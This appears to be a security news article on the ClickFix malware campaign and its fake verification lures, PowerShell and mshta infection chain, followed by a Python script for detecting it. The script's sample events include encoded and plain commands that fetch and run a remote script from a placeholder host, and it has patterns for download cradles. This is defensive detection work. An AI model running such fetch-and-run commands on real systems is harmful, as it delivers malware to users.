A sophisticated cyber threat known as ClickFix has emerged, employing deceptive browser notifications and pop-ups labeled Fix Now and Bot Verification to lure users into initiating malware downloads. These seemingly innocuous prompts, when clicked, trigger a multi-stage infection process that installs persistent malware capable of credential theft, keylogging, and remote system access.
Campaign Overview
Security researchers have identified that ClickFix primarily targets users of financial institutions and e-commerce platforms. The attackers utilize advanced social engineering techniques to circumvent standard security protocols. The campaign often begins with compromised websites or malicious advertisements that generate convincing error messages or security alerts. These alerts falsely claim that the user’s device is infected or requires verification, creating a sense of urgency that prompts victims to click the deceptive buttons. The design of these notifications closely mimics legitimate browser warnings or security messages, making even security-conscious users susceptible to the deception.
Infection Mechanism
Upon clicking the Fix Now or Bot Verification buttons, obfuscated JavaScript code executes, initiating the download of seemingly benign files that serve as the initial stage of the attack chain. These files often masquerade as PDF documents or system utilities but contain embedded PowerShell commands that execute upon opening. This execution establishes persistence on the system and downloads the main malware components from command and control servers.
The malware employs complex obfuscation techniques to evade traditional detection methods. Once established, it begins harvesting sensitive information while maintaining a low system footprint to avoid detection. Researchers have observed it targeting stored passwords, cryptocurrency wallets, and financial credentials, while also implementing keylogging functionality to capture additional sensitive information.
Technical Analysis
The infection sequence begins when users click the malicious Fix Now or Bot Verification buttons, triggering obfuscated JavaScript that decodes to the next-stage payload. That code creates a hidden iframe and then launches an encoded PowerShell command that downloads and executes the main malware payload.
The malware authors frequently rotate their command and control infrastructure, with researchers tracking numerous unique domains used in the past month alone. This rapid infrastructure change complicates efforts to block or take down the malicious servers.
Evolution of ClickFix
ClickFix has evolved significantly since its initial identification. Early variants primarily displayed fake browser update pages, but recent versions have incorporated more advanced deception techniques: some variants, for instance, employ fake reCAPTCHA or Cloudflare Turnstile verification challenges to trick users into executing malicious PowerShell code.
Attack Analysis
The attack starts with a short JavaScript snippet injected into compromised websites, which loads legitimate dependencies such as web3, pako, and crypto-js. This initial script interacts with smart contracts to retrieve and execute additional code segments. The retrieved data is compressed and base64-encoded and must be decrypted before execution.
The ClickFix lures presented to users include either a fake Cloudflare Turnstile verification that claims to detect unusual web traffic or a fake reCAPTCHA challenge alongside a DNS error message. Both lures instruct users to open the Run command (Win+R) and execute a PowerShell command that’s automatically copied to their clipboard.
The PowerShell commands execute mshta.exe with remote scripts that deliver payloads including Emmenhtal Loader and ultimately Lumma Stealer or Vidar Stealer. Researchers noted that the ClearFake infrastructure behind this campaign includes over 9,300 compromised websites, with thousands of users potentially exposed to these malicious lures every day. The use of blockchain technology for malware delivery is an emerging threat that makes traditional mitigation and blocking significantly more challenging, because the code is served from a decentralized ledger rather than from a server that can be taken down.
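As an added illustration of the detection side of the chain described in the Technical Analysis and Attack Analysis sections (not code from the original article or from the researchers it cites), the following Python sketch scores process-creation events for the Run-dialog pattern: a PowerShell or mshta.exe process spawned directly by explorer.exe, a -EncodedCommand argument that decodes to an mshta launch or a download-and-execute cradle, and hidden-window or execution-policy-bypass flags. The ProcessEvent record, the indicator weights, the threshold, and the sample events (including the reserved example.invalid placeholder domain) are this example's own assumptions; the encoded command is constructed inline.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


# Minimal process-creation record (the fields Sysmon Event ID 1 or EDR
# telemetry provide); the field names are this example's own.
@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Programs the Win+R lure asks the victim to run, or that the pasted command then spawns.
RUN_DIALOG_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# -EncodedCommand and its accepted abbreviations, followed by a base64 token.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_FLAGS = re.compile(r"-(?:w|windowstyle)\s+hidden|-(?:ep|executionpolicy)\s+bypass", re.IGNORECASE)
URL_PATTERN = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
CRADLE = re.compile(r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcessEvent) -> List[Tuple[int, str]]:
    """Return (weight, reason) pairs for the ClickFix indicators present in one event."""
    parent, child = basename(event.parent_image), basename(event.image)
    decoded = decode_encoded_command(event.command_line)
    # Match patterns against the visible command line plus the decoded payload, if any.
    effective = event.command_line + (" " + decoded if decoded else "")
    urls = URL_PATTERN.findall(effective)
    findings: List[Tuple[int, str]] = []
    if parent == "explorer.exe" and child in RUN_DIALOG_HOSTS:
        findings.append((1, f"{child} spawned by explorer.exe (Run-dialog paste pattern)"))
    if decoded is not None:
        findings.append((1, "encoded PowerShell decoded: " + decoded))
    if HIDDEN_FLAGS.search(event.command_line):
        findings.append((1, "hidden window or execution-policy bypass flag"))
    if urls and (child == "mshta.exe" or "mshta" in effective.lower()):
        findings.append((2, "mshta executing a remote script: " + urls[0]))
    elif urls and CRADLE.search(effective):
        findings.append((2, "download-and-execute cradle: " + urls[0]))
    return findings


def detect(events, threshold: int = 2) -> List[Tuple[int, int, List[str]]]:
    """Return (index, score, reasons) for events whose combined weight reaches the threshold."""
    hits = []
    for i, ev in enumerate(events):
        findings = analyze(ev)
        score = sum(w for w, _ in findings)
        if score >= threshold:
            hits.append((i, score, [r for _, r in findings]))
    return hits


# Constructed sample telemetry (not real events). example.invalid is a reserved placeholder domain.
EXPLORER = r"C:\Windows\explorer.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
LURE_PLAINTEXT = "mshta https://example.invalid/check.hta"
LURE_ENCODED = base64.b64encode(LURE_PLAINTEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcessEvent(EXPLORER, POWERSHELL, f"powershell -w hidden -ep bypass -enc {LURE_ENCODED}"),
    ProcessEvent(POWERSHELL, MSHTA, "mshta https://example.invalid/check.hta"),
    ProcessEvent(EXPLORER, POWERSHELL, "powershell -NoProfile -Command Get-Process"),  # admin via Win+R
    ProcessEvent(r"C:\Windows\System32\cmd.exe", POWERSHELL, r"powershell -w hidden -File C:\ops\backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for index, score, reasons in detect(SAMPLE_EVENTS):
        print(f"event {index}: score {score}")
        for reason in reasons:
            print("   -", reason)
```

Running the block flags only the first two sample events. The explorer.exe-parent signal is deliberately weighted low because administrators also open PowerShell via Win+R, so it only reaches the threshold together with a decoded payload, a hidden-window flag, or a remote script; in production the same scoring would consume Sysmon Event ID 1 or EDR process telemetry, and the decoded command gives the analyst the staging URL to block.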
Recommendations
To protect against ClickFix attacks, organizations and individuals should:
– Exercise Caution with Unexpected Prompts: Be wary of unsolicited browser notifications or pop-ups urging immediate action.
– Verify Sources: Before clicking on any Fix Now or Bot Verification buttons, confirm the legitimacy of the source.
– Keep Software Updated: Regularly update browsers and security software to the latest versions to benefit from security patches.
– Educate Users: Provide training on recognizing and avoiding social engineering tactics used in malware campaigns.
– Implement Robust Security Measures: Deploy endpoint and web controls that can detect and block this execution chain, in particular PowerShell and mshta.exe launched from the Run dialog to fetch remote scripts.
By staying informed and vigilant, users can significantly reduce the risk of falling victim to ClickFix and similar malware campaigns.